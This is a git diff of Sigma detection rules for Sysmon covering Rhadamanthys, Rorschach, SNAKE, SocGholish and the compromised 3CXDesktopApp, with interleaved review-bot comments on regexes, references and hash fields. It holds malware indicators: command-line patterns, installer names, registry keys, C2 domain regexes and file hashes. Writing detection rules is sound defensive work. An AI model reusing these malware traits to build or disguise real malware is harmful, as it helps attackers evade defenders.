@@ -1,9 +1,7 @@ title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE id: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5 status: test -description: Detects the use of Rundll32 to launch an NSIS module that serves as the - main stealer capability of Rhadamanthys infostealer, as observed in reports and - samples in early 2023 +description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 references: - https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 - https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ @@ -25,12 +23,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_rundll32: - - OriginalFileName: RUNDLL32.EXE - - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe selection_dll: - CommandLine|contains: nsis_uns + CommandLine|contains: nsis_uns selection_export_function: - CommandLine|contains: PrintUIEntry + CommandLine|contains: PrintUIEntry condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml b/sigma/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml index 8aca1a8e6..0eeb24050 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml @@ -29,7 +29,7 @@ detection: - \netsh.exe - \wevtutil.exe - \vssadmin.exe - CommandLine|contains: '11111111' + CommandLine|contains: '11111111' condition: process_creation and selection falsepositives: - Unlikely 
diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml index 02b0e2d65..7ca36776e 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml @@ -1,8 +1,7 @@ title: SNAKE Malware Installer Name Indicators id: 99eccc2b-7182-442f-8806-b76cc36d866b status: experimental -description: Detects filename indicators associated with the SNAKE malware as reported - by CISA in their report +description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -24,7 +23,6 @@ detection: - \jpinst.exe condition: file_event and selection falsepositives: - - Some legitimate software was also seen using these names. Apply additional filters - and use this rule as a hunting basis. + - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis. level: low ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml index 9c42b6845..b10cef088 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml 
@@ -1,8 +1,7 @@ title: SNAKE Malware WerFault Persistence File Creation id: 64827580-e4c3-4c64-97eb-c72325d45399 status: experimental -description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory - by a non-system process, which can be indicative of potential SNAKE malware activity +description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml index 12bc29e3d..25be10efc 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml @@ -1,8 +1,7 @@ title: Potential SNAKE Malware Installation CLI Arguments Indicator id: 02cbc035-b390-49fe-a9ff-3bb402c826db status: experimental -description: Detects a specific command line arguments sequence seen used by SNAKE - malware during its installation as described by CISA in their report +description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) 
@@ -19,7 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16} + # This CLI regex is based on the following description from the report: + # The jpsetup.exe installer requires two arguments to be passed via the command line for execution + # The first argument is a wide character string hashed with SHA-256 twice -> We assume that the first argument is of length SHA256 + # The AES initialization vector (IV) consists of the first 16 bytes of the second argument to jpsetup.exe -> We assume that the second argument is of at least 16 bytes (16 characters) + CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16} condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml index eca3580a4..dada977d9 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml @@ -1,8 +1,7 @@ title: Potential SNAKE Malware Installation Binary Indicator id: d91ff53f-fd0c-419d-a6b8-ae038d5c3733 status: experimental -description: Detects a specific binary name seen used by SNAKE malware during its - installation as described by CISA in their report +description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) 
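Review bot: The regex `\s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16}` is unanchored and is the only constraint in `selection`, so any process whose command line carries a 64-character hex token followed by a hex token of at least 16 characters matches, not just the SNAKE installer; tooling that passes SHA-256 digests or long hex identifiers as arguments is a plausible source of hits that the `falsepositives: Unlikely` entry does not acknowledge. The new comment also presents "both arguments are hex" as following from the report, but the quoted report text only says the first argument is hashed with SHA-256 and the IV is taken from the second argument, neither of which implies the arguments themselves are hex strings; suggest stating that explicitly, e.g. `# Assumption (not stated in the report): both arguments are passed as hex strings`. Since the companion rule in this commit keys on the `jpsetup.exe`/`jpinst.exe` names, keeping this rule name-agnostic looks intentional to catch renamed installers, so the fix here is documentation and the false-positive note rather than a tighter selection.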
@@ -23,15 +22,15 @@ detection: - \jpsetup.exe - \jpinst.exe filter_main_cli_name: - CommandLine: + CommandLine: - jpinst.exe - jpinst - jpsetup.exe - jpsetup filter_main_cli_empty: - CommandLine: '' + CommandLine: '' filter_main_cli_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml index adfb954ce..eb615e8c3 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml @@ -1,9 +1,7 @@ title: Potential SNAKE Malware Persistence Service Execution id: f7536642-4a08-4dd9-b6d5-c3286d8975ed status: experimental -description: Detects a specific child/parent process relationship indicative of a - "WerFault" process running from the "WinSxS" as a service. This could be indicative - of potential SNAKE malware activity as reported by CISA. +description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml index 72befe206..d5c84ed95 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml 
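Review bot: `filter_main_cli_null` now reads `CommandLine:` with no value where it previously read `CommandLine: null`; both parse to a YAML null, but the bare form looks like an accidentally dropped value, especially next to the sibling `filter_main_cli_empty: CommandLine: ''` which filters the empty string. Suggest keeping the explicit form `CommandLine: null` or adding `# field absent from the event` so the distinction between "empty command line" and "no command line field" stays visible to the reader.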
+++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml @@ -1,8 +1,7 @@ title: SNAKE Malware Covert Store Registry Key id: d0fa35db-0e92-400e-aa16-d32ae2521618 status: experimental -description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' - which is a key related to SNAKE malware as described by CISA +description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml index 13e93cc8a..0ec62d97f 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml @@ -1,9 +1,7 @@ title: Potential Encrypted Registry Blob Related To SNAKE Malware id: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b status: experimental -description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" - key with an uncommon name. This could be related to SNAKE Malware as reported - by CISA +description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) 
@@ -23,11 +21,10 @@ detection: selection: TargetObject|contains: \SOFTWARE\Classes\.wav\OpenWithProgIds\ filter_main_wav: - - TargetObject|endswith: .AssocFile.WAV - - TargetObject|contains: .wav. + - TargetObject|endswith: .AssocFile.WAV + - TargetObject|contains: .wav. condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - Some additional tuning might be required to tune out legitimate processes that - write to this key by default + - Some additional tuning might be required to tune out legitimate processes that write to this key by default level: medium ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml b/sigma/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml index 11ec42887..ad29cd091 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml @@ -1,9 +1,7 @@ title: Potential SocGholish Second Stage C2 DNS Query id: 70761fe8-6aa2-4f80-98c1-a57049c08e66 status: test -description: Detects a DNS query initiated from a "wscript" process for domains matching - a specific pattern that was seen being used by SocGholish for its Command and - Control traffic +description: Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic references: - https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations - https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations 
@@ -27,7 +25,6 @@ detection: QueryName|re: '[a-f0-9]{4,8}\.(?:[a-z0-9\-]+\.){2}[a-z0-9\-]+' condition: dns_query and selection falsepositives: - - Legitimate domain names matching the regex pattern by chance (e.g. domain controllers - dc01.company.co.uk) + - Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk) level: high ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml index 774d7219e..b15fe50c4 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml 
@@ -1,23 +1,22 @@ title: Potential Compromised 3CXDesktopApp Beaconing Activity - DNS id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp - compromise +description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise references: - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml index c762380e3..98efc271f 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml 
@@ -1,23 +1,22 @@ title: Malicious DLL Load By Compromised 3CXDesktopApp id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar status: experimental -description: Detects DLL load activity of known compromised DLLs used in by the compromised - 3CXDesktopApp +description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp references: - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ author: Nasreddine Bencherchali (Nextron Systems) 
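Review bot: The only reference listed in this hunk, the 2021 Microsoft FoggyWeb/NOBELIUM blog post, does not concern the 3CX supply-chain compromise that the title, description and `related` ids describe, so the provenance of the DLL hashes in the next hunk cannot be followed from the rule itself; if this is carried over from an earlier rule, replace or supplement it with the 3CX advisory the hashes were taken from (the sibling DNS and netcon rules in this commit cite a CrowdStrike situational-awareness thread). The reflowed description also still reads `used in by the compromised 3CXDesktopApp`; suggest `Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp`.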
@@ -35,34 +34,38 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_hashes_1: Hashes|contains: + # ffmpeg.dll - SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896 - SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429 - MD5=74BC2D0B6680FAA1A5A76B27E5479CBC + # d3dcompiler_47.dll - SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03 - SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E - MD5=82187AD3F0C6C225E2FBA0C867280CC9 + # Inner object from ffmpeg.dll - SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952 - SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30 - MD5=11BC82A9BD8297BD0823BCE5D6202082 + # ICONIC Stealer payload - SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423 - SHA1=3B3E778B647371262120A523EB873C20BB82BEAF - MD5=7FAEA2B01796B80D180399040BB69835 selection_hashes_2: - - sha256: - - 7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896 - - 11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03 - - F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952 - - 8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423 - - sha1: - - BF939C9C261D27EE7BB92325CC588624FCA75429 - - 20D554A80D759C50D6537DD7097FED84DD258B3E - - 894E7D4FFD764BB458809C7F0643694B036EAD30 - - 3B3E778B647371262120A523EB873C20BB82BEAF - - md5: - - 74BC2D0B6680FAA1A5A76B27E5479CBC - - 82187AD3F0C6C225E2FBA0C867280CC9 - - 11BC82A9BD8297BD0823BCE5D6202082 - - 7FAEA2B01796B80D180399040BB69835 + - sha256: + - 7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896 + - 11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03 + - F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952 + - 8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423 + - sha1: + - BF939C9C261D27EE7BB92325CC588624FCA75429 + - 20D554A80D759C50D6537DD7097FED84DD258B3E + - 894E7D4FFD764BB458809C7F0643694B036EAD30 + - 3B3E778B647371262120A523EB873C20BB82BEAF + - md5: + 
- 74BC2D0B6680FAA1A5A76B27E5479CBC + - 82187AD3F0C6C225E2FBA0C867280CC9 + - 11BC82A9BD8297BD0823BCE5D6202082 + - 7FAEA2B01796B80D180399040BB69835 condition: image_load and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml index 039bbb003..17a4bb27e 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml 
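Review bot: `selection_hashes_1` keys on `SHA256=`, `SHA1=` and `MD5=` substrings of the Sysmon `Hashes` field, but which algorithms appear in that field depends on the Sysmon `HashAlgorithms` configuration (as far as I recall a default configuration emits SHA1 only), and the rule states this prerequisite nowhere. Because the condition is `1 of selection_*`, a deployment hashing a single algorithm will still match on that one branch, so this is a coverage caveat rather than a correctness bug; suggest recording it in the rule, e.g. a `definition: 'Requirements: Sysmon must be configured with HashAlgorithms including SHA256, SHA1 and/or MD5 for the Hashes field to carry those values'` under `logsource`. The new per-file comments (`# ffmpeg.dll`, `# d3dcompiler_47.dll`, ...) are a good addition; applying the same labels to the `selection_hashes_2` lists would keep the two selections readable side by side.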
@@ -1,23 +1,22 @@ title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon id: 51eecf75-d069-43c7-9ea2-63f75499edd4 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp - compromise +description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise references: - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml index 2cb55f27b..5ade1bba8 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml 
@@ -1,20 +1,20 @@ title: Potential Compromised 3CXDesktopApp Execution id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental description: Detects execution of known compromised version of 3CXDesktopApp references: @@ -37,6 +37,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_hashes_1: Hashes|contains: + # 3CX Desktop 18.12.407 - SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC - SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 - SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE @@ -46,6 +47,7 @@ detection: - MD5=BB915073385DD16A846DFA318AFA3C19 - MD5=08D79E1FFFA244CC0DC61F7D2036ACA9 - MD5=4965EDF659753E3C05D800C6C8A23A7A + # 3CX Desktop 18.12.416 - SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 - SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 - SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 
@@ -55,6 +57,7 @@ detection: - MD5=9833A4779B69B38E3E51F04E395674C6 - MD5=704DB9184700481A56E5100FB56496CE - MD5=8EE6802F085F7A9DF7E0303E65722DC0 + # 3CXDesktopApp MSI - SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 - SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 - SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA 
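Review bot: The version-grouping comments (`# 3CX Desktop 18.12.407`, `# 3CX Desktop 18.12.416`, `# 3CXDesktopApp MSI`) are added only to selection_hashes_1, while selection_hashes_2 in the next hunk repeats the same digests grouped by algorithm with no annotation at all. A maintainer updating one list gets no hint that the other must be kept in sync, and the per-version attribution is lost there. I would add a comment above selection_hashes_2, e.g. `# Same digests as selection_hashes_1 (version grouping documented there), presumably for sources that expose per-algorithm hash fields`, or carry the version tag as a trailing comment on each digest.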
@@ -62,37 +65,37 @@ detection: - MD5=F3D4144860CA10BA60F7EF4D176CC736 - MD5=0EEB1C0133EB4D571178B2D9D14CE3E9 selection_hashes_2: - - sha256: - - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC - - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 - - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE - - FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 - - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 - - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 - - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 - - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 - - sha1: - - 480DC408EF50BE69EBCF84B95750F7E93A8A1859 - - 3B43A5D8B83C637D00D769660D01333E88F5A187 - - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA - - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 - - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB - - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 - - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA - - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E - - md5: - - BB915073385DD16A846DFA318AFA3C19 - - 08D79E1FFFA244CC0DC61F7D2036ACA9 - - 4965EDF659753E3C05D800C6C8A23A7A - - 9833A4779B69B38E3E51F04E395674C6 - - 704DB9184700481A56E5100FB56496CE - - 8EE6802F085F7A9DF7E0303E65722DC0 - - F3D4144860CA10BA60F7EF4D176CC736 - - 0EEB1C0133EB4D571178B2D9D14CE3E9 + - sha256: + - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC + - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 + - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE + - 